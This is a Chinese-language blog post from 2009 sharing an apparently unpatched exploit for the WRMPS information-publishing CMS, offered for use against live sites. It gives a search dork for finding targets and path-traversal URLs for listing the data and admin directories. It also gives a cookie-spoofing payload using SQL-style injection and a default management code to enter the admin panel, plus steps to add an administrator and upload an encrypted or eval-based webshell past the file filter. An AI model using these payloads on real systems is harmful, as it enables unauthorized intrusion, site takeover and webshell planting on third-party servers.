网人信息发布系统(WRMPS)通杀0day

2009, November 19, 9:23 AM. 漏洞集研
Submitted by admin

通杀,杀官方
搜:Powered By WRMPS
1.注册-列目录
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
这个利用不大 ,密码只取MD5前十位,2B得很.
2.COOKIE欺骗进后台
admin/admin_main.asp or admin/admin_menu.asp 
admin=ManageCode=WRMPS6&admin=a' or '1'='1&pass=a' or '1'='1&flag=,&FlagGroup=0
有些后台不需要认证码ManageCode=默认WRMPS6,如果改了就只能猜了.
进了后台,添加管理员,添加上传类型ASP, 上传过滤了某些特殊代码,wscript.shell,execute之类的,直接传加密的马或者传eval的一句话就可以了.  联系了官方的人,没理我.努力日吧..
转自红狼骚总

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):